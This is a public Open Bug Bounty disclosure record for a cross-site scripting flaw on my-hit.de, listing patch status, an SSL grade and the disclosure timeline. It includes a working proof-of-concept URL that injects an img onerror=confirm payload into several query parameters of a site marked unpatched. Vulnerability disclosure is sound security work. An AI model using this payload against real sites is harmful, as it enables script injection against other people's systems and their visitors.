Vulnerable URL:
http://www.my-hit.de/index.php/Mythen?ie=xss%3Cimg%20src=x%20onerror=confirm(%22OPENBUGBOUNTY%22)%3E&cx;=xss%3Cimg%20src=x%20onerror=confirm(%22OPENBUGBOUNTY%22)%3E&sa;=xss%3Cimg%20src=x%20onerror=confirm(%22OPENBUGBOUNTY%22)%3E&q;=xss%3Cimg%20src=x%20onerror=confirm(%22OPENBUGBOUNTY%22)%3E&
Details:
Description |
Value |
Patched: |
No |
Latest check for patch: |
28.07.2017 |
Vulnerability type: |
XSS |
Vulnerability status: |
Publicly disclosed |
Alexa Rank |
Unknown / Not calculated |
VIP website status: |
No |
Check my-hit.de SSL connection: |
(Grade: F) |
Coordinated Disclosure Timeline:
Description |
Value |
Vulnerability submitted via Open Bug Bounty |
30 December, 2016 09:41 GMT |
Generic security notifications sent to website owner |
30 December, 2016 09:44 GMT |
Vulnerability details disclosed by researcher |
6 January, 2017 10:16 GMT |